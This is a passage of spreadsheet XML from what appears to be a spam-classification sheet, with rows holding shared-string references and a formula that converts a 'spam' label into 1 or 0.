    <row r="3427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3427" t="s">
        <v>8532</v>
      </c>
      <c r="B3427" t="s">
        <v>5294</v>
      </c>
      <c r="C3427" s="1">
        <f>IF(B3427="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3428" t="s">
        <v>8533</v>
      </c>
      <c r="B3428" t="s">
        <v>5294</v>
      </c>
      <c r="C3428" s="1">
        <f>IF(B3428="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3429" t="s">
        <v>8534</v>
      </c>
      <c r="B3429" t="s">
        <v>5294</v>
      </c>
      <c r="C3429" s="1">
        <f>IF(B3429="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3430" t="s">
        <v>8535</v>
      </c>
      <c r="B3430" t="s">
        <v>5294</v>
      </c>
      <c r="C3430" s="1">
        <f>IF(B3430="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3431" t="s">
        <v>8536</v>
      </c>
      <c r="B3431" t="s">
        <v>5294</v>
      </c>
      <c r="C3431" s="1">
        <f>IF(B3431="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3432" t="s">
        <v>8537</v>
      </c>
      <c r="B3432" t="s">
        <v>5294</v>
      </c>
      <c r="C3432" s="1">
        <f>IF(B3432="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3433" t="s">
        <v>8538</v>
      </c>
      <c r="B3433" t="s">
        <v>5297</v>
      </c>
      <c r="C3433" s="1">
        <f>IF(B3433="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3434" t="s">
        <v>8539</v>
      </c>
      <c r="B3434" t="s">
        <v>5294</v>
      </c>
      <c r="C3434" s="1">
        <f>IF(B3434="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3435" t="s">
        <v>8540</v>
      </c>
      <c r="B3435" t="s">
        <v>5294</v>
      </c>
      <c r="C3435" s="1">
        <f>IF(B3435="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3436" t="s">
        <v>8541</v>
      </c>
      <c r="B3436" t="s">
        <v>5294</v>
      </c>
      <c r="C3436" s="1">
        <f>IF(B3436="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3437" t="s">
        <v>8542</v>
      </c>
      <c r="B3437" t="s">
        <v>5294</v>
      </c>
      <c r="C3437" s="1">
        <f>IF(B3437="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3438" t="s">
        <v>8543</v>
      </c>
      <c r="B3438" t="s">
        <v>5294</v>
      </c>
      <c r="C3438" s="1">
        <f>IF(B3438="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3439" t="s">
        <v>8544</v>
      </c>
      <c r="B3439" t="s">
        <v>5294</v>
      </c>
      <c r="C3439" s="1">
        <f>IF(B3439="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3440" t="s">
        <v>8545</v>
      </c>
      <c r="B3440" t="s">
        <v>5294</v>
      </c>
      <c r="C3440" s="1">
        <f>IF(B3440="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3441" t="s">
        <v>8546</v>
      </c>
      <c r="B3441" t="s">
        <v>5294</v>
      </c>
      <c r="C3441" s="1">
        <f>IF(B3441="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3442" t="s">
        <v>8547</v>
      </c>
      <c r="B3442" t="s">
        <v>5297</v>
      </c>
      <c r="C3442" s="1">
        <f>IF(B3442="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3443" t="s">
        <v>8548</v>
      </c>
      <c r="B3443" t="s">
        <v>5297</v>
      </c>
      <c r="C3443" s="1">
        <f>IF(B3443="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3444" t="s">
        <v>8549</v>
      </c>
      <c r="B3444" t="s">
        <v>5294</v>
      </c>
      <c r="C3444" s="1">
        <f>IF(B3444="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3445" t="s">
        <v>8550</v>
      </c>
      <c r="B3445" t="s">
        <v>5294</v>
      </c>
      <c r="C3445" s="1">
        <f>IF(B3445="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3446" t="s">
        <v>7585</v>
      </c>
      <c r="B3446" t="s">
        <v>5294</v>
      </c>
      <c r="C3446" s="1">
        <f>IF(B3446="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3447" t="s">
        <v>8551</v>
      </c>
      <c r="B3447" t="s">
        <v>5294</v>
      </c>
      <c r="C3447" s="1">
        <f>IF(B3447="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3448" t="s">
        <v>8552</v>
      </c>
      <c r="B3448" t="s">
        <v>5294</v>
      </c>
      <c r="C3448" s="1">
        <f>IF(B3448="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3449" t="s">
        <v>8553</v>
      </c>
      <c r="B3449" t="s">
        <v>5294</v>
      </c>
      <c r="C3449" s="1">
        <f>IF(B3449="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3450" t="s">
        <v>8554</v>
      </c>
      <c r="B3450" t="s">
        <v>5294</v>
      </c>
      <c r="C3450" s="1">
        <f>IF(B3450="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3451" t="s">
        <v>8555</v>
      </c>
      <c r="B3451" t="s">
        <v>5294</v>
      </c>
      <c r="C3451" s="1">
        <f>IF(B3451="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3452" t="s">
        <v>8556</v>
      </c>
      <c r="B3452" t="s">
        <v>5294</v>
      </c>
      <c r="C3452" s="1">
        <f>IF(B3452="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3453" t="s">
        <v>8557</v>
      </c>
      <c r="B3453" t="s">
        <v>5294</v>
      </c>
      <c r="C3453" s="1">
        <f>IF(B3453="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3454" t="s">
        <v>8558</v>
      </c>
      <c r="B3454" t="s">
        <v>5294</v>
      </c>
      <c r="C3454" s="1">
        <f>IF(B3454="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3455" t="s">
        <v>6895</v>
      </c>
      <c r="B3455" t="s">
        <v>5294</v>
      </c>
      <c r="C3455" s="1">
        <f>IF(B3455="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3456" t="s">
        <v>8559</v>
      </c>
      <c r="B3456" t="s">
        <v>5294</v>
      </c>
      <c r="C3456" s="1">
        <f>IF(B3456="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3457" t="s">
        <v>8560</v>
      </c>
      <c r="B3457" t="s">
        <v>5294</v>
      </c>
      <c r="C3457" s="1">
        <f>IF(B3457="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3458" t="s">
        <v>7509</v>
      </c>
      <c r="B3458" t="s">
        <v>5294</v>
      </c>
      <c r="C3458" s="1">
        <f>IF(B3458="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3459" t="s">
        <v>8561</v>
      </c>
      <c r="B3459" t="s">
        <v>5294</v>
      </c>
      <c r="C3459" s="1">
        <f>IF(B3459="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3460" t="s">
        <v>8562</v>
      </c>
      <c r="B3460" t="s">
        <v>5297</v>
      </c>
      <c r="C3460" s="1">
        <f>IF(B3460="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3461" t="s">
        <v>8563</v>
      </c>
      <c r="B3461" t="s">
        <v>5294</v>
      </c>
      <c r="C3461" s="1">
        <f>IF(B3461="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3462" t="s">
        <v>8564</v>
      </c>
      <c r="B3462" t="s">
        <v>5294</v>
      </c>
      <c r="C3462" s="1">
        <f>IF(B3462="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3463" t="s">
        <v>8565</v>
      </c>
      <c r="B3463" t="s">
        <v>5297</v>
      </c>
      <c r="C3463" s="1">
        <f>IF(B3463="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3464" t="s">
        <v>8566</v>
      </c>
      <c r="B3464" t="s">
        <v>5294</v>
      </c>
      <c r="C3464" s="1">
        <f>IF(B3464="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3465" t="s">
        <v>8567</v>
      </c>
      <c r="B3465" t="s">
        <v>5294</v>
      </c>
      <c r="C3465" s="1">
        <f>IF(B3465="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3466" t="s">
        <v>8568</v>
      </c>
      <c r="B3466" t="s">
        <v>5294</v>
      </c>
      <c r="C3466" s="1">
        <f>IF(B3466="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3467" t="s">
        <v>8569</v>
      </c>
      <c r="B3467" t="s">
        <v>5294</v>
      </c>
      <c r="C3467" s="1">
        <f>IF(B3467="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3468" t="s">
        <v>6237</v>
      </c>
      <c r="B3468" t="s">
        <v>5297</v>
      </c>
      <c r="C3468" s="1">
        <f>IF(B3468="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3469" t="s">
        <v>8570</v>
      </c>
      <c r="B3469" t="s">
        <v>5294</v>
      </c>
      <c r="C3469" s="1">
        <f>IF(B3469="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3470" t="s">
        <v>8571</v>
      </c>
      <c r="B3470" t="s">
        <v>5294</v>
      </c>
      <c r="C3470" s="1">
        <f>IF(B3470="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3471" t="s">
        <v>5715</v>
      </c>
      <c r="B3471" t="s">
        <v>5294</v>
      </c>
      <c r="C3471" s="1">
        <f>IF(B3471="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3472" t="s">
        <v>8572</v>
      </c>
      <c r="B3472" t="s">
        <v>5294</v>
      </c>
      <c r="C3472" s="1">
        <f>IF(B3472="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3473" t="s">
        <v>8573</v>
      </c>
      <c r="B3473" t="s">
        <v>5294</v>
      </c>
      <c r="C3473" s="1">
        <f>IF(B3473="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3474" t="s">
        <v>8574</v>
      </c>
      <c r="B3474" t="s">
        <v>5294</v>
      </c>
      <c r="C3474" s="1">
        <f>IF(B3474="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3475" t="s">
        <v>8575</v>
      </c>
      <c r="B3475" t="s">
        <v>5294</v>
      </c>
      <c r="C3475" s="1">
        <f>IF(B3475="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3476" t="s">
        <v>6545</v>
      </c>
      <c r="B3476" t="s">
        <v>5294</v>
      </c>
      <c r="C3476" s="1">
        <f>IF(B3476="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3477" t="s">
        <v>8576</v>
      </c>
      <c r="B3477" t="s">
        <v>5294</v>
      </c>
      <c r="C3477" s="1">
        <f>IF(B3477="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3478" t="s">
        <v>8577</v>
      </c>
      <c r="B3478" t="s">
        <v>5294</v>
      </c>
      <c r="C3478" s="1">
        <f>IF(B3478="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3479" t="s">
        <v>8578</v>
      </c>
      <c r="B3479" t="s">
        <v>5294</v>
      </c>
      <c r="C3479" s="1">
        <f>IF(B3479="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3480" t="s">
        <v>8579</v>
      </c>
      <c r="B3480" t="s">
        <v>5294</v>
      </c>
      <c r="C3480" s="1">
        <f>IF(B3480="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3481" t="s">
        <v>8580</v>
      </c>
      <c r="B3481" t="s">
        <v>5294</v>
      </c>
      <c r="C3481" s="1">
        <f>IF(B3481="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3482" t="s">
        <v>8581</v>
      </c>
      <c r="B3482" t="s">
        <v>5294</v>
      </c>
      <c r="C3482" s="1">
        <f>IF(B3482="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3483" t="s">
        <v>8582</v>
      </c>
      <c r="B3483" t="s">
        <v>5297</v>
      </c>
      <c r="C3483" s="1">
        <f>IF(B3483="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3484" t="s">
        <v>8583</v>
      </c>
      <c r="B3484" t="s">
        <v>5294</v>
      </c>
      <c r="C3484" s="1">
        <f>IF(B3484="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3485" t="s">
        <v>8584</v>
      </c>
      <c r="B3485" t="s">
        <v>5294</v>
      </c>
      <c r="C3485" s="1">
        <f>IF(B3485="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3486" t="s">
        <v>6816</v>
      </c>
      <c r="B3486" t="s">
        <v>5294</v>
      </c>
      <c r="C3486" s="1">
        <f>IF(B3486="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3487" t="s">
        <v>8585</v>
      </c>
      <c r="B3487" t="s">
        <v>5294</v>
      </c>
      <c r="C3487" s="1">
        <f>IF(B3487="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3488" t="s">
        <v>8586</v>
      </c>
      <c r="B3488" t="s">
        <v>5294</v>
      </c>
      <c r="C3488" s="1">
        <f>IF(B3488="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3489" t="s">
        <v>8456</v>
      </c>
      <c r="B3489" t="s">
        <v>5294</v>
      </c>
      <c r="C3489" s="1">
        <f>IF(B3489="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3490" t="s">
        <v>8587</v>
      </c>
      <c r="B3490" t="s">
        <v>5294</v>
      </c>
      <c r="C3490" s="1">
        <f>IF(B3490="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3491" t="s">
        <v>8588</v>
      </c>
      <c r="B3491" t="s">
        <v>5294</v>
      </c>
      <c r="C3491" s="1">
        <f>IF(B3491="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3492" t="s">
        <v>7392</v>
      </c>
      <c r="B3492" t="s">
        <v>5294</v>
      </c>
      <c r="C3492" s="1">
        <f>IF(B3492="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3493" t="s">
        <v>8589</v>
      </c>
      <c r="B3493" t="s">
        <v>5294</v>
      </c>
      <c r="C3493" s="1">
        <f>IF(B3493="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3494" t="s">
        <v>8590</v>
      </c>
      <c r="B3494" t="s">
        <v>5294</v>
      </c>
      <c r="C3494" s="1">
        <f>IF(B3494="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3495" t="s">
        <v>8591</v>
      </c>
      <c r="B3495" t="s">
        <v>5297</v>
      </c>
      <c r="C3495" s="1">
        <f>IF(B3495="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3496" t="s">
        <v>8592</v>
      </c>
      <c r="B3496" t="s">
        <v>5297</v>
      </c>
      <c r="C3496" s="1">
        <f>IF(B3496="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3497" t="s">
        <v>8593</v>
      </c>
      <c r="B3497" t="s">
        <v>5294</v>
      </c>
      <c r="C3497" s="1">
        <f>IF(B3497="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3498" t="s">
        <v>8594</v>
      </c>
      <c r="B3498" t="s">
        <v>5294</v>
      </c>
      <c r="C3498" s="1">
        <f>IF(B3498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3499" t="s">
        <v>8595</v>
      </c>
      <c r="B3499" t="s">
        <v>5294</v>
      </c>
      <c r="C3499" s="1">
        <f>IF(B3499="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3500" t="s">
        <v>8596</v>
      </c>
      <c r="B3500" t="s">
        <v>5294</v>
      </c>
      <c r="C3500" s="1">
        <f>IF(B3500="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3501" t="s">
        <v>8597</v>
      </c>
      <c r="B3501" t="s">
        <v>5297</v>
      </c>
      <c r="C3501" s="1">
        <f>IF(B3501="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3502" t="s">
        <v>8598</v>
      </c>
      <c r="B3502" t="s">
        <v>5294</v>
      </c>
      <c r="C3502" s="1">
        <f>IF(B3502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3503" t="s">
        <v>8599</v>
      </c>
      <c r="B3503" t="s">
        <v>5294</v>
      </c>
      <c r="C3503" s="1">
        <f>IF(B3503="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3504" t="s">
        <v>8600</v>
      </c>
      <c r="B3504" t="s">
        <v>5294</v>
      </c>
      <c r="C3504" s="1">
        <f>IF(B3504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3505" t="s">
        <v>8601</v>
      </c>
      <c r="B3505" t="s">
        <v>5294</v>
      </c>
      <c r="C3505" s="1">
        <f>IF(B3505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3506" t="s">
        <v>8602</v>
      </c>
      <c r="B3506" t="s">
        <v>5294</v>
      </c>
      <c r="C3506" s="1">
        <f>IF(B3506="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3507" t="s">
        <v>8603</v>
      </c>
      <c r="B3507" t="s">
        <v>5294</v>
      </c>
      <c r="C3507" s="1">
        <f>IF(B3507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3508" t="s">
        <v>8604</v>
      </c>
      <c r="B3508" t="s">
        <v>5294</v>
      </c>
      <c r="C3508" s="1">
        <f>IF(B3508="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3509" t="s">
        <v>8605</v>
      </c>
      <c r="B3509" t="s">
        <v>5294</v>
      </c>
      <c r="C3509" s="1">
        <f>IF(B3509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3510" t="s">
        <v>8606</v>
      </c>
      <c r="B3510" t="s">
        <v>5294</v>
      </c>
      <c r="C3510" s="1">
        <f>IF(B3510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3511" t="s">
        <v>8607</v>
      </c>
      <c r="B3511" t="s">
        <v>5294</v>
      </c>
      <c r="C3511" s="1">
        <f>IF(B3511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3512" t="s">
        <v>8608</v>
      </c>
      <c r="B3512" t="s">
        <v>5294</v>
      </c>
      <c r="C3512" s="1">
        <f>IF(B3512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3513" t="s">
        <v>8609</v>
      </c>
      <c r="B3513" t="s">
        <v>5294</v>
      </c>
      <c r="C3513" s="1">
        <f>IF(B3513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3514" t="s">
        <v>8610</v>
      </c>
      <c r="B3514" t="s">
        <v>5294</v>
      </c>
      <c r="C3514" s="1">
        <f>IF(B3514="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3515" t="s">
        <v>8611</v>
      </c>
      <c r="B3515" t="s">
        <v>5294</v>
      </c>
      <c r="C3515" s="1">
        <f>IF(B3515="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3516" t="s">
        <v>8612</v>
      </c>
      <c r="B3516" t="s">
        <v>5294</v>
      </c>
      <c r="C3516" s="1">
        <f>IF(B3516="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3517" t="s">
        <v>8613</v>
      </c>
      <c r="B3517" t="s">
        <v>5294</v>
      </c>
      <c r="C3517" s="1">
        <f>IF(B3517="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3518" t="s">
        <v>8614</v>
      </c>
      <c r="B3518" t="s">
        <v>5294</v>
      </c>
      <c r="C3518" s="1">
        <f>IF(B3518="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3519" t="s">
        <v>8615</v>
      </c>
      <c r="B3519" t="s">
        <v>5294</v>
      </c>
      <c r="C3519" s="1">
        <f>IF(B3519="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3520" t="s">
        <v>8616</v>
      </c>
      <c r="B3520" t="s">
        <v>5294</v>
      </c>
      <c r="C3520" s="1">
        <f>IF(B3520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3521" t="s">
        <v>8617</v>
      </c>
      <c r="B3521" t="s">
        <v>5294</v>
      </c>
      <c r="C3521" s="1">
        <f>IF(B3521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3522" t="s">
        <v>8618</v>
      </c>
      <c r="B3522" t="s">
        <v>5294</v>
      </c>
      <c r="C3522" s="1">
        <f>IF(B3522="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3523" t="s">
        <v>8619</v>
      </c>
      <c r="B3523" t="s">
        <v>5294</v>
      </c>
      <c r="C3523" s="1">
        <f>IF(B3523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3524" t="s">
        <v>8620</v>
      </c>
      <c r="B3524" t="s">
        <v>5294</v>
      </c>
      <c r="C3524" s="1">
        <f>IF(B3524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3525" t="s">
        <v>8621</v>
      </c>
      <c r="B3525" t="s">
        <v>5294</v>
      </c>
      <c r="C3525" s="1">
        <f>IF(B3525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3526" t="s">
        <v>8622</v>
      </c>
      <c r="B3526" t="s">
        <v>5294</v>
      </c>
      <c r="C3526" s="1">
        <f>IF(B3526="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3527" t="s">
        <v>8623</v>
      </c>
      <c r="B3527" t="s">
        <v>5294</v>
      </c>
      <c r="C3527" s="1">
        <f>IF(B3527="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3528" t="s">
        <v>8624</v>
      </c>
      <c r="B3528" t="s">
        <v>5294</v>
      </c>
      <c r="C3528" s="1">
        <f>IF(B3528="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3529" t="s">
        <v>8625</v>
      </c>
      <c r="B3529" t="s">
        <v>5297</v>
      </c>
      <c r="C3529" s="1">
        <f>IF(B3529="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3530" t="s">
        <v>8626</v>
      </c>
      <c r="B3530" t="s">
        <v>5297</v>
      </c>
      <c r="C3530" s="1">
        <f>IF(B3530="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
